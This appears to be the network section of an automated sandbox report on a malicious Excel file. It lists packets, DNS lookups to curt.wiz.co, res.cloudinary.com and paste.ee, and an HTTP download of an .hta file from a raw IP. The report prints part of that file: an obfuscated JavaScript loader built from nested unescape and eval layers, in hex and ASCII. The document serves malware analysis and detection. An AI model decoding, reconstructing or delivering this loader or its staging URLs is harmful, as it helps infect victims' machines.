                                                                Dec 13, 2024 17:48:52.353362083 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.353399038 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.359644890 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.359674931 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.359745026 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.359761953 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.359776974 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.359795094 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.359878063 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.360377073 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.365097046 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.365168095 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.365173101 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.365190983 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.365293980 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.365511894 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.371102095 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.371167898 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.371217966 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.371217966 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.371227026 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.374449968 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.374512911 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.374521017 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.466120958 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.466155052 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.466418982 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.466418982 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.466432095 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472119093 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472160101 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472208977 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472246885 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472266912 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472302914 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.472302914 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.472313881 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472331047 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.472343922 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.472359896 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.536557913 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.536575079 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.536598921 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.536637068 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.536772013 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.536772013 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.536783934 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.536880016 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.540911913 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.540920973 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.540950060 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.540977955 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.541014910 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.541045904 CET44349174151.101.193.137192.168.2.22
                                                                Dec 13, 2024 17:48:52.541048050 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.541048050 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.541151047 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.541192055 CET49174443192.168.2.22151.101.193.137
                                                                Dec 13, 2024 17:48:52.541846991 CET49174443192.168.2.22151.101.193.137
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 13, 2024 17:48:03.269450903 CET5456253192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:03.830405951 CET53545628.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:08.496283054 CET5291753192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:09.063991070 CET53529178.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:09.115844011 CET5291753192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:09.682331085 CET53529178.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:26.918266058 CET6275153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:27.189901114 CET5789353192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:30.043692112 CET5482153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:30.179303885 CET53548218.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:30.213028908 CET5482153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:30.347071886 CET53548218.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:30.347300053 CET5482153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:30.469928026 CET53548218.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:30.520641088 CET5482153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:31.331216097 CET53548218.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:31.331614971 CET5482153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:31.466810942 CET53548218.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:45.887984991 CET5471953192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:46.136436939 CET53547198.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:46.169477940 CET4988153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:50.486351967 CET5499853192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:50.729845047 CET53549988.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:50.730072021 CET5499853192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:50.971498966 CET53549988.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:50.971714020 CET5499853192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:51.112942934 CET53549988.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:51.115284920 CET5499853192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:51.238538980 CET53549988.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:48:51.238962889 CET5499853192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:48:51.374356031 CET53549988.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:49:05.472569942 CET5278153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:49:05.607330084 CET53527818.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:49:05.607518911 CET5278153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:49:05.742688894 CET53527818.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:49:05.742872000 CET5278153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:49:05.877263069 CET53527818.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:49:05.877521038 CET5278153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:49:06.000294924 CET53527818.8.8.8192.168.2.22
                                                                Dec 13, 2024 17:49:06.000648022 CET5278153192.168.2.228.8.8.8
                                                                Dec 13, 2024 17:49:06.134886980 CET53527818.8.8.8192.168.2.22
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 13, 2024 17:48:03.269450903 CET192.168.2.228.8.8.80xd90dStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:08.496283054 CET192.168.2.228.8.8.80xb6ecStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.115844011 CET192.168.2.228.8.8.80xb6ecStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:26.918266058 CET192.168.2.228.8.8.80x9e20Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:27.189901114 CET192.168.2.228.8.8.80x1657Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.043692112 CET192.168.2.228.8.8.80x7e04Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.213028908 CET192.168.2.228.8.8.80x7e04Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.347300053 CET192.168.2.228.8.8.80x7e04Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.520641088 CET192.168.2.228.8.8.80x7e04Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.331614971 CET192.168.2.228.8.8.80x7e04Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:45.887984991 CET192.168.2.228.8.8.80x220fStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.169477940 CET192.168.2.228.8.8.80xed4bStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.486351967 CET192.168.2.228.8.8.80x3273Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.730072021 CET192.168.2.228.8.8.80x3273Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.971714020 CET192.168.2.228.8.8.80x3273Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.115284920 CET192.168.2.228.8.8.80x3273Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.238962889 CET192.168.2.228.8.8.80x3273Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.472569942 CET192.168.2.228.8.8.80x49ecStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.607518911 CET192.168.2.228.8.8.80x49ecStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.742872000 CET192.168.2.228.8.8.80x49ecStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.877521038 CET192.168.2.228.8.8.80x49ecStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:06.000648022 CET192.168.2.228.8.8.80x49ecStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 13, 2024 17:48:03.830405951 CET8.8.8.8192.168.2.220xd90dNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:03.830405951 CET8.8.8.8192.168.2.220xd90dNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:03.830405951 CET8.8.8.8192.168.2.220xd90dNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.063991070 CET8.8.8.8192.168.2.220xb6ecNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.063991070 CET8.8.8.8192.168.2.220xb6ecNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.063991070 CET8.8.8.8192.168.2.220xb6ecNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.682331085 CET8.8.8.8192.168.2.220xb6ecNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.682331085 CET8.8.8.8192.168.2.220xb6ecNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:09.682331085 CET8.8.8.8192.168.2.220xb6ecNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:27.185753107 CET8.8.8.8192.168.2.220x9e20No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:27.451236963 CET8.8.8.8192.168.2.220x1657No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.179303885 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.179303885 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.179303885 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.347071886 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.347071886 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.347071886 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.469928026 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.469928026 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:30.469928026 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.331216097 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.331216097 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.331216097 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.466810942 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.466810942 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:31.466810942 CET8.8.8.8192.168.2.220x7e04No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.136436939 CET8.8.8.8192.168.2.220x220fNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.136436939 CET8.8.8.8192.168.2.220x220fNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.136436939 CET8.8.8.8192.168.2.220x220fNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.136436939 CET8.8.8.8192.168.2.220x220fNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.136436939 CET8.8.8.8192.168.2.220x220fNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:46.527493000 CET8.8.8.8192.168.2.220xed4bNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.729845047 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.729845047 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.971498966 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:50.971498966 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.112942934 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.112942934 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.238538980 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.238538980 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.374356031 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:48:51.374356031 CET8.8.8.8192.168.2.220x3273No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.607330084 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.607330084 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.742688894 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.742688894 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.877263069 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:05.877263069 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:06.000294924 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:06.000294924 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:06.134886980 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                Dec 13, 2024 17:49:06.134886980 CET8.8.8.8192.168.2.220x49ecNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                • curt.wiz.co
                                                                • res.cloudinary.com
                                                                • 23.95.235.29
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.224916423.95.235.29803288C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                TimestampBytes transferredDirectionData
                                                                Dec 13, 2024 17:48:06.942019939 CET389OUTGET /118/sup/greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 23.95.235.29
                                                                Connection: Keep-Alive
                                                                Dec 13, 2024 17:48:08.070453882 CET1236INHTTP/1.1 200 OK
                                                                Date: Fri, 13 Dec 2024 16:48:07 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Fri, 13 Dec 2024 05:06:59 GMT
                                                                ETag: "23f26-6291fccf92813"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 147238
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/hta
                                                                Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
                                                                Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%37%34%25%33%35%25%33%32%25%33%33%25%33%30%25%36%32%25%36%32%25%36%34%25%33%36%25%36%36%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%38%25%33%38%25%33%
                                                                Dec 13, 2024 17:48:08.070478916 CET1236INData Raw: 33 32 25 32 35 25 33 33 25 33 35 25 32 35 25 33 33 25 33 31 25 32 35 25 33 33 25 33 31 25 32 35 25 33 33 25 33 33 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33
                                                                Data Ascii: 32%25%33%35%25%33%31%25%33%31%25%33%33%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%
                                                                Dec 13, 2024 17:48:08.070492029 CET1236INData Raw: 32 35 25 33 36 25 36 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25 32 35 25 33 36 25 36 32 25 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32 35 25 33 37 25 33 32 25 32
                                                                Data Ascii: 25%36%65%25%37%34%25%32%38%25%36%62%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%25%32%65%
                                                                Dec 13, 2024 17:48:08.070614100 CET1236INData Raw: 33 35 25 32 35 25 33 33 25 33 37 25 32 35 25 33 34 25 33 30 25 32 35 25 33 37 25 33 34 25 32 35 25 33 37 25 33 36 25 32 35 25 33 37 25 33 34 25 32 35 25 33 36 25 33 33 25 32 35 25 33 37 25 36 32 25 32 35 25 33 36 25 36 32 25 32 35 25 33 36 25 33
                                                                Data Ascii: 35%25%33%37%25%34%30%25%37%34%25%37%36%25%37%34%25%36%33%25%37%62%25%36%62%25%36%30%25%37%33%25%36%64%25%32%65%25%32%34%25%36%31%25%37%34%25%37%35%25%37%66%25%36%39%25%37%34%25%37%62%25%34%37%25%32%30%25%34%65%25%34%64%25%34%39%25%34%39%25%37%
                                                                Dec 13, 2024 17:48:08.070626020 CET1236INData Raw: 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32
                                                                Data Ascii: 25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%
                                                                Dec 13, 2024 17:48:08.070637941 CET1236INData Raw: 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 36 34 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 32 25 32 35 25 33 30 25 36 35 25 32 35 25 33
                                                                Data Ascii: 30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%30%61%25%30%61%25%30%64%25%30%62%25%30%65%25%30%62%25%30%62%25%30%65%25%30%39%25%30%35%25%30%64%25%30%62%25%30%61%25%
                                                                Dec 13, 2024 17:48:08.070652008 CET1236INData Raw: 36 36 25 32 35 25 33 37 25 33 30 25 32 35 25 33 35 25 33 37 25 32 35 25 33 36 25 36 34 25 32 35 25 33 34 25 33 39 25 32 35 25 33 34 25 33 38 25 32 35 25 33 35 25 33 36 25 32 35 25 33 35 25 33 36 25 32 35 25 33 34 25 33 38 25 32 35 25 33 34 25 36
                                                                Data Ascii: 66%25%37%30%25%35%37%25%36%64%25%34%39%25%34%38%25%35%36%25%35%36%25%34%38%25%34%63%25%37%35%25%37%33%25%37%33%25%35%66%25%37%39%25%37%33%25%37%35%25%35%63%25%35%62%25%35%34%25%36%63%25%37%39%25%36%65%25%35%65%25%35%61%25%36%64%25%34%65%25%36%
